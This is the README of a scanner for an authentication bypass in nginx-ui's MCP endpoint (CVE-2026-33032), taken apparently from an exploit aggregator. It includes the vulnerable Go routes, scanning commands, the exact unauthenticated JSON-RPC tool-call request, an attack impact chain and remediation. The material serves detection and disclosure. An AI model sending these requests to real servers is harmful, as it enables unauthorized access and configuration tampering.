Share
## https://sploitus.com/exploit?id=81CB5F6F-3C3E-5B81-A3F1-3878300CAE13
# CVE-2026-33032 Scanner

**Non-destructive vulnerability scanner for Nginx-UI MCP Endpoint Authentication Bypass**

## Vulnerability Overview

**CVE-2026-33032** is an authentication bypass vulnerability in nginx-ui's Model Context Protocol (MCP) integration. The `/mcp_message` endpoint lacks authentication middleware while providing access to all MCP tools, allowing remote attackers to:

- Read nginx configurations and status
- Create/modify/delete nginx configuration files
- Restart or reload nginx service
- Exfiltrate sensitive configuration data
- Inject malicious configurations for traffic interception

### Root Cause

1. **Auth Asymmetry**: The `/mcp` endpoint requires authentication, but `/mcp_message` does not:
   ```go
   r.Any("/mcp", middleware.IPWhiteList(), middleware.AuthRequired(), ...)
   r.Any("/mcp_message", middleware.IPWhiteList(), ...)  // Missing AuthRequired()
   ```

2. **Fail-Open IP Whitelist**: The default IP whitelist is empty, which the middleware treats as "allow all"

3. **Both Endpoints Share Handler**: Both route to the same `mcp.ServeHTTP()` which processes all MCP tool invocations

## Scanner Features

โœ… **Non-destructive testing** - Uses only read-only MCP tools  
โœ… **Comprehensive fingerprinting** - Identifies nginx-ui installations  
โœ… **Safe proof-of-concept** - No configuration changes made  
โœ… **Batch scanning** - Process multiple targets from file  
โœ… **Detailed reporting** - JSON output for integration  

## Installation

```bash
# Clone or download the scanner
git clone https://github.com/cve-2026-33032-scanner.git
cd cve-2026-33032
chmod +x cve-2026-33032-scanner.py

# Install dependencies (if needed)
pip3 install requests
```

## Usage

### Basic Scan

```bash
# Scan a single target
python3 cve-2026-33032-scanner.py -u http://target.com:9000

# Scan with verbose output
python3 cve-2026-33032-scanner.py -u https://nginx-ui.example.com -v

# Custom timeout
python3 cve-2026-33032-scanner.py -u http://192.168.1.100:9000 -t 15
```

### Batch Scanning

```bash
# Scan multiple targets from file
python3 cve-2026-33032-scanner.py -f targets.txt

# With verbose output and JSON report
python3 cve-2026-33032-scanner.py -f targets.txt -v -o results.json

#Burp Pingback
python3 cve-2026-33032-scanner.py -u http://target.com:9000 --collaborator abc123.burpcollaborator.net
```

### Target File Format

```
# targets.txt - one URL per line
http://192.168.1.100:9000
https://nginx-ui.corp.com
http://10.0.0.50:9000
```

## How It Works

The scanner performs a multi-stage detection process:

### Stage 1: Fingerprinting
Checks common nginx-ui endpoints to identify the installation:
- `/api/info` - Version information
- `/login` - Login page
- `/api/auth/login` - Authentication endpoint
- `/mcp` and `/mcp_message` - MCP endpoints

### Stage 2: Authentication Check
Tests the `/mcp` endpoint to verify it properly requires authentication (baseline)

### Stage 3: Vulnerability Exploitation
Attempts **non-destructive** MCP tool calls via `/mcp_message` WITHOUT authentication:

1. **nginx_status** (safest) - Reads nginx process status
2. **nginx_config_list** - Lists configuration files
3. **nginx_config_base_path** - Gets config directory path

If any tool succeeds without authentication, the vulnerability is confirmed.

## Safe MCP Tools Used

The scanner only invokes **read-only** MCP tools:

| Tool | Description | Impact |
|------|-------------|--------|
| `nginx_status` | Read nginx service status | No changes |
| `nginx_config_list` | List configuration files | No changes |
| `nginx_config_base_path` | Get config directory path | No changes |

**Tools explicitly avoided:**
- `nginx_config_add` - Would create files
- `nginx_config_modify` - Would alter configs
- `restart_nginx` / `reload_nginx` - Service disruption
- `nginx_config_enable` - Would change active configs

## Output Examples

### Vulnerable Target
```
[+] nginx-ui detected: Found 'nginx-ui' in /login
[+] /mcp endpoint properly protected

[*] Testing /mcp_message endpoint (CVE-2026-33032)...
  [*] Trying tool: nginx_status - Read nginx status (safest)
      Status: 200

======================================================================
[!] VULNERABLE to CVE-2026-33032
======================================================================
Proof: Successfully executed nginx_status without authentication
```

### Protected Target
```
[+] nginx-ui detected: Version endpoint accessible
[+] /mcp endpoint properly protected

[*] Testing /mcp_message endpoint (CVE-2026-33032)...
  [*] Trying tool: nginx_status - Read nginx status (safest)
      Status: 401
      Auth required (protected) โœ“

[+] NOT vulnerable - endpoint requires authentication
```

## Remediation

If the vulnerability is confirmed:

1. **Immediate Fix**: Add authentication middleware to `/mcp_message`:
   ```go
   r.Any("/mcp_message", middleware.IPWhiteList(), middleware.AuthRequired(),
       func(c *gin.Context) {
           mcp.ServeHTTP(c)
       })
   ```

2. **Defense in Depth**: 
   - Configure IP whitelist to deny-all by default
   - Restrict MCP endpoints to localhost only if external access not needed
   - Implement rate limiting on MCP endpoints

3. **Upgrade**: Update to patched nginx-ui version when available

## Responsible Disclosure

This tool is designed for:
- โœ… Bug bounty programs
- โœ… Authorized penetration testing
- โœ… Security research with permission
- โœ… Vulnerability validation before disclosure

**Do NOT use this tool on systems you don't own or have explicit permission to test.**

## Bug Bounty Tips

When reporting this vulnerability:

1. **Severity**: Critical (CVSS 9.8+)
   - Network accessible
   - No authentication required
   - Complete system compromise
   - Config exfiltration + modification

2. **Proof**: Include scanner output showing successful unauthenticated MCP tool invocation

3. **Impact Chain**:
   - Unauthenticated access โ†’ Config read โ†’ Backend topology revealed
   - Config write โ†’ Malicious proxy injection โ†’ Credential harvesting
   - Nginx restart โ†’ Service disruption โ†’ DoS

4. **Safe PoC**: Use only the read-only tools (nginx_status, nginx_config_list)

## Technical Details

### MCP Tool Invocation Format

```json
POST /mcp_message HTTP/1.1
Content-Type: application/json

{
  "jsonrpc": "2.0",
  "method": "tools/call",
  "params": {
    "name": "nginx_status",
    "arguments": {}
  },
  "id": 1
}
```

### Successful Response
```json
{
  "jsonrpc": "2.0",
  "result": {
    "content": [
      {
        "type": "text",
        "text": "nginx is running (PID: 1234)"
      }
    ]
  },
  "id": 1
}
```

### Protected Response
```json
HTTP/1.1 401 Unauthorized
{
  "error": "authentication required"
}
```

## References

- **CVE**: CVE-2026-33032
- **Affected**: nginx-ui (versions with MCP integration)
- **CVSS**: 9.8 (Critical)
- **CWE**: CWE-306 (Missing Authentication for Critical Function)

## License

This tool is provided for educational and authorized security testing purposes only.

## Author

**Antony Esthak Twinson @ Cyber Tamarin**  
Security Researcher | Bug Bounty Hunter  
Specializing in Web Application Security & Vulnerability Research

---

**Disclaimer**: This scanner performs non-destructive testing only. Always obtain proper authorization before testing any systems.